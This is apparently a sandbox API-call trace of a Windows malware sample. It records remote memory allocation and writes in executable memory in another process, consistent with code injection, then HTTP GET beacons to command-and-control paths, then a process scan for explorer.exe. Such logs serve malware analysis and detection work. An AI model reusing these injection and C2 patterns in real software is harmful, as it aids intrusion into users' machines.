	[0230.312] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ad240*, nSize=0x4, lpNumberOfBytesWritten=0x128b70 | out: lpBuffer=0x22ad240*, lpNumberOfBytesWritten=0x128b70*=0x4) returned 1
	[0230.313] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0x340000
	[0230.313] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x340000, lpBuffer=0x128fec*, nSize=0x400, lpNumberOfBytesWritten=0x128b70 | out: lpBuffer=0x128fec*, lpNumberOfBytesWritten=0x128b70*=0x400) returned 1
	[0230.313] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x40) returned 0x350000
	[0230.313] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x350000, lpBuffer=0x128f6c*, nSize=0x80, lpNumberOfBytesWritten=0x128b70 | out: lpBuffer=0x128f6c*, lpNumberOfBytesWritten=0x128b70*=0x80) returned 1
	[0230.314] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x360000
	[0230.314] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128af0, nSize=0x70, lpNumberOfBytesRead=0x128ad0 | out: lpBuffer=0x128af0*, lpNumberOfBytesRead=0x128ad0*=0x70) returned 1
	[0230.314] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0230.314] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x2c, flAllocationType=0x3000, flProtect=0x40) returned 0x370000
	[0230.314] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x370000, lpBuffer=0x22a6260*, nSize=0x2c, lpNumberOfBytesWritten=0x128ac8 | out: lpBuffer=0x22a6260*, lpNumberOfBytesWritten=0x128ac8*=0x2c) returned 1
	[0230.314] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128af0*, nSize=0x70, lpNumberOfBytesWritten=0x128ac8 | out: lpBuffer=0x128af0*, lpNumberOfBytesWritten=0x128ac8*=0x70) returned 1
	[0230.315] ResetEvent (hEvent=0x60c) returned 1
	[0230.315] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.320] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128af0, nSize=0x70, lpNumberOfBytesRead=0x128ac8 | out: lpBuffer=0x128af0*, lpNumberOfBytesRead=0x128ac8*=0x70) returned 1
	[0230.320] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.320] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0230.320] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x350000, lpBuffer=0x128f6c, nSize=0x80, lpNumberOfBytesRead=0x128b84 | out: lpBuffer=0x128f6c*, lpNumberOfBytesRead=0x128b84*=0x80) returned 1
	[0230.320] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x340000, lpBuffer=0x128fec, nSize=0x400, lpNumberOfBytesRead=0x128b84 | out: lpBuffer=0x128fec*, lpNumberOfBytesRead=0x128b84*=0x400) returned 1
	[0230.320] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x360004, lpBuffer=0x128bb0, nSize=0x4, lpNumberOfBytesRead=0x128b84 | out: lpBuffer=0x128bb0*, lpNumberOfBytesRead=0x128b84*=0x4) returned 1
	[0230.320] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x360000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.320] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.320] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.321] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.321] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x0) returned 0x2275d00
	[0230.321] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff510) returned 1
	[0230.321] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffcf0) returned 1
	[0230.321] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778460
	[0230.321] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffcf0
	[0230.321] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0230.321] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad318) returned 1
	[0230.321] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad378) returned 1
	[0230.321] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2d0) returned 1
	[0230.321] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x209fc0) returned 1
	[0230.321] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad348) returned 1
	[0230.321] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad240) returned 1
	[0230.321] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c7308) returned 1
	[0230.321] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0230.321] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0230.321] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0230.321] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/10/62/68975977/1/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0230.321] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128be4, dwBufferLength=0x4) returned 1
	[0230.321] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0230.726] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0230.727] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128bd4, lpdwBufferLength=0x128bd0, lpdwIndex=0x0 | out: lpBuffer=0x128bd4*, lpdwBufferLength=0x128bd0*=0x4, lpdwIndex=0x0) returned 1
	[0230.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x242550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1
	[0230.727] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x242550, cbMultiByte=-1, lpWideCharStr=0x22ffe70, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0230.727] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0230.727] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0230.727] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/63/shareDll/control///", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0230.727] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128bbc, dwBufferLength=0x4) returned 1
	[0230.727] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0231.097] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0231.098] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128bac, lpdwBufferLength=0x128ba8, lpdwIndex=0x0 | out: lpBuffer=0x128bac*, lpdwBufferLength=0x128ba8*=0x4, lpdwIndex=0x0) returned 1
	[0231.098] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0231.098] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x614
	[0231.102] Process32FirstW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0231.103] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0231.103] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0231.104] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0231.104] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0231.106] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0231.106] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0231.107] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0231.107] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0231.108] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0231.108] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0231.109] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0231.110] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0231.111] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0231.111] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0231.112] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0231.112] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0231.113] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0231.113] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0231.115] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0231.115] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.116] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0231.116] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.118] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0231.118] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.120] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0231.120] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.121] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0231.121] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.123] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0231.123] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.125] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0231.125] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.126] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0231.126] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0231.127] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0231.127] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.128] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0231.128] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0231.129] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0231.129] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0231.162] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0231.162] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.163] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0231.163] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0231.164] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0231.164] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0231.165] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0231.165] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0231.166] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0231.166] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0231.167] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0231.167] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0231.167] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0231.167] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0231.168] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0231.168] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0231.169] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0231.169] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0231.170] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0231.170] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0231.171] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0231.171] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0231.173] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0231.173] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0231.173] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0231.173] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0231.174] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0231.174] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0231.175] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0231.175] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0231.176] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0231.176] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0231.177] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0231.177] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0231.178] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0231.178] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0231.179] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0231.179] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0231.180] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0231.180] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0231.180] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0231.181] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0231.181] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0231.181] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0231.182] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0231.182] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0231.183] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0231.183] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0231.184] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0231.184] Process32NextW (in: hSnapshot=0x614, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0231.185] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
